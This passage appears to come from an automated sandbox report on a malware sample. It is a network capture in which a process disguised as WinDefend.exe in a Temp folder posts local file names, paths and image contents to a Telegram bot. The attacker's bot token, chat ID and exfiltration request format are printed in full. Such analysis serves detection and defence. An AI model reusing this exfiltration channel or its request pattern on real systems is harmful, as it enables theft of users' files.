fb 7c be 70 f8 9c 2c Data Ascii: M(x^'ArE;Bm5FM7X 2d6Am1IDATaTZQu%E\BcL=_UAt!$leAG%~%LMzGC>JXX-,,6HA2f+;E1?DH$0.\|VFD/AF4Mq8E*G+nxNBN\|p,
2024-05-23 13:35:27 UTC	2833	OUT	Data Raw: 45 12 04 61 80 84 ad 77 e1 38 1b cf 0b 02 ef 7f fc 89 06 2b 2b be f0 c2 45 7c 70 ec d8 63 4f 3f fd d4 76 5f fe f4 d3 4f 1d 3b f6 98 e1 50 75 f3 e9 cf 3c 6e b3 f1 6c 8d ad c1 a3 11 04 d1 7b 90 b0 f5 26 18 55 61 b3 71 36 1b 2f f0 c2 af 7e 7e ac 91 a3 bd ff fe fb 2f bf fc 75 7c 7c e6 cc 34 0b 03 a9 85 a3 47 8f 7e f5 ab ff 0e 1f 5f b9 f2 66 23 71 95 00 f0 29 df df df 7f e0 a0 20 f0 36 9e 27 3f 24 41 10 15 21 61 eb 65 38 e0 6c 3c cf 0b fc e7 c6 fe 49 e3 46 db d5 ab 3f 01 00 b7 db 3d 3f ff 47 35 2e b6 3d fd f4 53 f3 f3 7f 84 8f 73 b9 dc ef fc ce ef 36 32 06 00 08 3c f9 eb 02 2f d8 6c bc 6d 23 22 92 b4 8d 20 08 23 24 6c 3d 0b 96 8b e4 79 1b cf 0b 1e 71 b0 41 a3 2d 9b cd ce cc 7c 05 a3 48 dc 6e f7 8b 2f fe fb 33 67 a6 3d 9e aa a9 69 87 0e 1d fa da d7 fe f0 ab 5f Data Ascii: Eaw8++E\|pcO?v_O;Pu<nl{&Uaq6/~~/u\|\|4G~_f#q) 6'?$A!ae8l<IF?=?G5.=Ss62</lm#" #$l=yqA-\|Hn/3g=i_
2024-05-23 13:35:27 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 64 62 39 31 66 65 35 31 2d 34 37 62 36 2d 34 35 33 38 2d 62 37 34 35 2d 39 38 33 63 61 63 65 66 65 62 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --db91fe51-47b6-4538-b745-983cacefeb67Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:27 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:27 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
173	192.168.2.5	61222	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:26 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:27 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:27 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
174	192.168.2.5	61223	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:27 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="97972ca2-3a11-4d1f-b3e4-7aab3f66cf38" Host: api.telegram.org Content-Length: 2069 Expect: 100-continue
2024-05-23 13:35:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:27 UTC	40	OUT	Data Raw: 2d 2d 39 37 39 37 32 63 61 32 2d 33 61 31 31 2d 34 64 31 66 2d 62 33 65 34 2d 37 61 61 62 33 66 36 36 63 66 33 38 0d 0a Data Ascii: --97972ca2-3a11-4d1f-b3e4-7aab3f66cf38
2024-05-23 13:35:27 UTC	121	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=selection-actions.png; filename*=utf-8''selection-actions.png
2024-05-23 13:35:27 UTC	1723	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 04 4c 08 03 00 00 00 dc 0a 21 00 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 4b 50 4c 54 45 ff ff ff 7e 7e 7e 78 78 78 7e 7e 7e 78 78 78 7e 7e 7e 78 78 78 7e 7e 7e 7c 7c 7c 78 78 78 7c 7c 7c 78 78 78 78 78 78 7a 7a 7a 78 78 78 7a 7a 7a 7a 7a 7a 7a 7a 7a 78 78 78 7c 7c 7c 78 78 78 78 78 78 78 78 78 7c 7c 7c 78 78 78 c8 69 b4 70 00 00 00 19 74 52 4e 53 00 11 11 22 22 33 33 44 44 44 55 55 66 77 77 88 99 aa bb cc cc dd ee ff ff 66 3f 63 63 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 36 2f 32 32 2f 31 35 c3 07 49 55 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f Data Ascii: PNGIHDR(L!sBITOKPLTE~~~xxx~~~xxx~~~xxx~~~\|\|\|xxx\|\|\|xxxxxxzzzxxxzzzzzzzzzxxx\|\|\|xxxxxxxxx\|\|\|xxxiptRNS""33DDDUUfwwf?ccpHYs~tEXtCreation Time6/22/15IUtEXtSoftwareAdobe Firewo
2024-05-23 13:35:27 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 37 39 37 32 63 61 32 2d 33 61 31 31 2d 34 64 31 66 2d 62 33 65 34 2d 37 61 61 62 33 66 36 36 63 66 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --97972ca2-3a11-4d1f-b3e4-7aab3f66cf38Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:27 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:27 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 37 39 37 32 63 61 32 2d 33 61 31 31 2d 34 64 31 66 2d 62 33 65 34 2d 37 61 61 62 33 66 36 36 63 66 33 38 2d 2d 0d 0a Data Ascii: --97972ca2-3a11-4d1f-b3e4-7aab3f66cf38--
2024-05-23 13:35:27 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:27 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
175	192.168.2.5	61224	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:27 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 257 Expect: 100-continue
2024-05-23 13:35:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:28 UTC	257	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 62 30 32 31 35 65 64 30 61 30 39 30 37 35 33 33 30 61 31 63 36 64 64 33 64 62 66 62 61 31 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 36 62 30 32 31 35 65 64 30 61 30 39 30 37 35 33 33 30 61 31 63 36 64 64 33 64 62 66 62 61 31 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 30 2b Data Ascii: chat_id=1655240967&text=File%3A+6b0215ed0a09075330a1c6dd3dbfba1d.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C6b0215ed0a09075330a1c6dd3dbfba1d.png%0ASize%3A+20+
2024-05-23 13:35:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
176	192.168.2.5	61225	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:28 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="23df5747-e853-4484-8781-59e4497bb7ad" Host: api.telegram.org Content-Length: 3237 Expect: 100-continue
2024-05-23 13:35:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:28 UTC	40	OUT	Data Raw: 2d 2d 32 33 64 66 35 37 34 37 2d 65 38 35 33 2d 34 34 38 34 2d 38 37 38 31 2d 35 39 65 34 34 39 37 62 62 37 61 64 0d 0a Data Ascii: --23df5747-e853-4484-8781-59e4497bb7ad
2024-05-23 13:35:28 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 39 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 39 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=192.png; filename*=utf-8''192.png
2024-05-23 13:35:28 UTC	2919	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 0b 2e 49 44 41 54 78 9c ed dd 7d 6c 55 77 1d c7 f1 cf ef dc bb c2 68 9b b1 59 6a 25 d0 15 86 89 12 74 94 51 36 10 97 5b ca d3 9c 06 34 73 0f 8e 05 4c 36 d3 8c 99 b9 44 1d 82 0b 5b b6 05 35 51 37 b3 6c 63 b2 80 64 06 cc 8a 0f 91 29 1b 2d bd d9 d8 70 14 84 04 e6 3f 02 56 44 ad a5 66 9d 2b b5 c0 b9 e7 eb 1f d8 d0 9d 7b ef ce b9 f7 9e e7 df e7 f5 f7 b9 e7 fe 08 e7 db f3 be e7 9c db 02 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 14 06 e5 f5 0e bb 33 48 8f eb 6d 6a 83 61 ad 14 a8 3a 25 a8 13 85 89 00 26 02 18 01 70 54 41 fe 60 59 c6 db 17 81 a3 ad bd bd 23 5e af 81 e2 43 ba 51 63 Data Ascii: PNGIHDRRl.IDATx}lUwhYj%tQ6[4sL6D[5Q7lcd)-p?VDf+{DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD3Hmja:%&pTA`Y#^CQc
2024-05-23 13:35:28 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 32 33 64 66 35 37 34 37 2d 65 38 35 33 2d 34 34 38 34 2d 38 37 38 31 2d 35 39 65 34 34 39 37 62 62 37 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --23df5747-e853-4484-8781-59e4497bb7adContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:28 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:28 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 32 33 64 66 35 37 34 37 2d 65 38 35 33 2d 34 34 38 34 2d 38 37 38 31 2d 35 39 65 34 34 39 37 62 62 37 61 64 2d 2d 0d 0a Data Ascii: --23df5747-e853-4484-8781-59e4497bb7ad--
2024-05-23 13:35:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
177	192.168.2.5	61226	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:28 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 203 Expect: 100-continue
2024-05-23 13:35:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:28 UTC	203	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 73 65 6c 65 63 74 69 6f 6e 2d 61 63 74 69 6f 6e 73 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+selection-actions2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cselection-actions2x.png%0ASize%3A+3+KB
2024-05-23 13:35:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
178	192.168.2.5	61227	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:29 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="6153a184-1705-47dc-a342-7d33276f0460" Host: api.telegram.org Content-Length: 21070 Expect: 100-continue
2024-05-23 13:35:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:29 UTC	40	OUT	Data Raw: 2d 2d 36 31 35 33 61 31 38 34 2d 31 37 30 35 2d 34 37 64 63 2d 61 33 34 32 2d 37 64 33 33 32 37 36 66 30 34 36 30 0d 0a Data Ascii: --6153a184-1705-47dc-a342-7d33276f0460
2024-05-23 13:35:29 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 62 30 32 31 35 65 64 30 61 30 39 30 37 35 33 33 30 61 31 63 36 64 64 33 64 62 66 62 61 31 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 62 30 32 31 35 65 64 30 61 30 39 30 37 35 33 33 30 61 31 63 36 64 64 33 64 62 66 62 61 31 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=6b0215ed0a09075330a1c6dd3dbfba1d.png; filename*=utf-8''6b0215ed0a09075330a1c6dd3dbfba1d.png
2024-05-23 13:35:29 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 02 00 00 00 81 39 75 dd 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ec dd 79 78 5c e5 7d 37 fc df 7d d6 39 67 16 2d a3 d5 42 de 65 1b 2f 60 8c 17 e2 50 43 70 92 c6 26 2d 98 a4 25 09 0f 66 29 ed c5 0b b8 49 af b6 21 64 b9 9a e7 0a 59 da 5e dd 9e c4 29 ed 43 9e bc 40 db 37 49 1b 9c bc 6f 09 69 83 01 93 98 e0 15 c7 bb 2c e3 5d d6 3a 5a 66 9f b3 dd ef 1f 47 3e 8c 47 b2 ac 65 a4 33 92 be 9f 8b 2a a3 99 33 67 6e d1 44 5f dd db ef 66 af 9c e1 04 00 00 00 e3 26 f8 dd 00 00 00 80 69 02 99 0a 00 00 50 1c c8 54 00 00 80 e2 40 a6 02 00 00 14 07 32 15 00 00 a0 38 90 a9 00 00 00 c5 81 4c 05 00 00 28 0e 64 2a 00 00 40 71 20 53 01 00 00 8a 03 99 0a Data Ascii: PNGIHDRq9upHYs&? IDATxyx\}7}9g-Be/`PCp&-%f)I!dY^)C@7Ioi,]:ZfG>Ge33gnD_f&iPT@28L(d@q S
2024-05-23 13:35:29 UTC	4096	OUT	Data Raw: eb f5 11 34 73 68 d7 6a 09 00 8c 08 e7 ef 87 a2 77 f0 0c 71 e2 ce e2 1b 1a ca 43 95 3d 39 fa ad 35 37 97 05 54 d9 b4 6a f4 60 5d 30 50 16 d2 de eb cf dd 38 67 f6 95 f0 f5 32 b5 70 21 92 69 9a c5 6a 66 fe 09 74 25 4e d3 b4 91 5f 7c d3 4d 37 5d eb 99 86 86 86 82 5b ad 5d 3b 30 6d b7 70 e1 c2 82 97 dc ae ed 74 32 85 33 f5 ba b1 94 7b 6b 67 7e 25 07 22 0a 7f e5 1b 83 2f d3 ee df 5a 30 db 5a 50 d5 61 30 9e 4c 64 5f d9 11 7f fa a9 9e fb 3e 92 fd d9 58 0e 54 2f 38 f9 15 00 46 c5 3d 3c 95 38 77 93 91 0d 84 2c 27 ee 30 e2 6b 97 dd 28 89 6a 5f c6 ec 4f 27 f6 ef dd f5 9b 23 07 bb 93 c9 b6 be d4 a6 b5 ab 3f b8 7c 29 71 ce 88 18 b1 2b ab 7e dd fb 38 4a 75 ad 7b f3 22 66 ea 14 5a 4c 3b aa a6 56 56 56 3e f6 d8 63 5e 40 7e ec 63 1f f3 16 22 69 9a b6 6d db b6 ca 2b db 7f Data Ascii: 4shjwqC=957Tj`]0P8g2p!ijft%N_\|M7][];0mpt23{kg~%"/Z0ZPa0Ld_>XT/8F=<8w,'0k(j_O'#?\|)q+~8Ju{"fZL;VVV>c^@~c"im+
2024-05-23 13:35:29 UTC	4096	OUT	Data Raw: 0d f9 0e f9 d5 1b ef 75 1f 8c 53 2c 16 1b ff 4d 60 72 c4 62 31 d3 34 65 59 f6 bb 21 00 50 d2 66 6e a6 4a a2 24 33 99 ae 2e e9 90 1f a2 de 16 9a c1 83 bd e3 19 ef f5 f4 f7 f7 17 e9 47 81 df 2d ae 41 00 00 20 00 49 44 41 54 c9 10 8f c7 31 fc 0b 00 c3 9b b9 99 2a ca 92 cc 9c c1 9d d4 02 f9 2b 7b f3 ab 3a 60 2b 2a 00 00 14 98 b9 99 2a 89 92 2c 5e 55 d8 21 7f 81 52 7e 97 54 98 98 9a f8 65 65 65 45 bf 27 4c 1c 74 52 01 e0 ba 66 6e a6 ca b2 a4 48 ef 47 66 7e 7c 7a 21 3a fe bd a7 c3 a8 ab ab 93 65 d9 34 cd e2 de 16 26 42 63 63 a3 df 4d 00 80 29 60 e6 ae fb 15 45 49 96 65 45 51 0a 0a e2 e7 4f ac 4e f4 30 ef a2 45 8b 26 e8 ce 50 44 b2 2c e3 ff 53 00 30 12 33 b7 9f 2a 4a a2 24 5d 55 a4 77 f0 74 a9 bb 16 89 26 2c 56 e7 cf 9f 1f 8f c7 2f 5e bc 38 11 37 87 a2 90 65 79 Data Ascii: uS,M`rb14eY!PfnJ$3.G-A IDAT1+{:`+,^U!R~TeeeE'LtRfnHGf~\|z!:e4&BccM)`EIeEQON0E&PD,S03J$]Uwt&,V/^87ey
2024-05-23 13:35:29 UTC	4096	OUT	Data Raw: 30 95 30 c6 54 55 15 04 21 99 4c 12 91 a6 aa 8f 6c f9 dd b0 1a 49 f4 a7 cb ab ca 97 ad 5b 6e 18 b9 b6 8e de 2e 5b bb a1 a1 4e 96 a5 64 a2 df 34 8d 77 4e 5c 7c a7 87 c7 fa ad de ae 3e 3d 1c 4e f4 a7 92 39 69 cd da 0f 3c f2 e0 67 dc db b6 b5 b5 31 c6 c2 e1 b0 aa aa 08 54 18 33 8c fd 02 c0 54 e2 76 55 83 c1 60 32 99 74 27 56 b5 40 e0 4b 4f 3d 5a a5 eb ff b9 73 2f 37 73 0d f3 e6 76 b4 b6 9e 2c 57 56 2d b8 31 18 64 b2 2c 9f bb d0 76 a8 57 e8 4b 26 92 f1 64 c3 dc ca 80 ce 75 d9 f9 e3 3f 7c e0 a6 c5 03 c7 a7 f4 f6 f6 66 b3 d9 b2 b2 b2 60 30 88 4e 2a 8c 87 f8 c0 67 bf ea 77 1b fc 71 43 98 34 fc 45 01 e0 ab f7 97 ec be 7f bc 8c ed ae c5 f5 ce 80 0b 85 42 c1 60 30 ff 5d 8c 31 41 10 24 49 ca 64 32 b6 6d bb a7 94 af be 65 f9 47 ef ba 4d 90 04 5b 14 d2 89 54 5b 47 57 Data Ascii: 00TU!LlI[n.[Nd4wN\\|>=N9i<g1T3TvU`2t'V@KO=Zs/7sv,WV-1d,vWK&du?\|f`0N*gwqC4EB`0]1A$Id2meGM[T[GW
2024-05-23 13:35:29 UTC	4096	OUT	Data Raw: e4 1f fe e1 1f e6 cf 9f 3f 31 1f 34 7d 68 9a 56 5f 5f 3f 6f de 3c 5d d7 8b 7e f3 82 39 54 d7 f0 31 26 8a a2 fb 20 6e 67 89 06 e6 51 dd 89 54 4e e4 70 22 e2 b9 ee 6e 55 12 17 cd 9d 6b 64 53 89 de ce ce ae 2e 45 12 c2 c1 70 18 48 d7 23 00 00 10 70 49 44 41 54 2a 91 b2 6d db 8e 27 2c cb 12 25 f1 aa 8f 66 44 44 dd 46 6a 76 a0 5c 14 c5 eb 16 19 1e 39 77 8b 4e 51 6e 55 44 8a a2 78 cb be c6 63 f0 16 9a 91 bc 54 d0 c7 9d 66 90 a9 3e bb 78 f1 e2 b1 63 c7 66 72 9a ba b2 d9 81 95 ef 0d b5 e2 c4 7d ca ac 5a 4c 76 8c 4e 26 93 39 73 e6 cc c5 8b 17 57 ae 5c 59 57 57 e7 77 73 c8 db e2 72 a5 fa e0 00 c7 ab ca 44 94 6b 6b e3 dc 89 77 9c 37 6c d2 22 37 34 2d fd c0 f1 43 7b ea aa d3 36 37 35 55 e6 96 91 c9 64 02 ba 4e 79 d9 cd 1d ce 89 92 f6 40 87 d2 4b ee f1 0b 06 83 35 35 Data Ascii: ?14}hV__?o<]~9T1& ngQTNp"nUkdS.EpH#pIDAT*m',%fDDFjv\9wNQnUDxcTf>xcfr}ZLvN&9sW\YWWwsrDkkw7l"74-C{675UdNy@K55
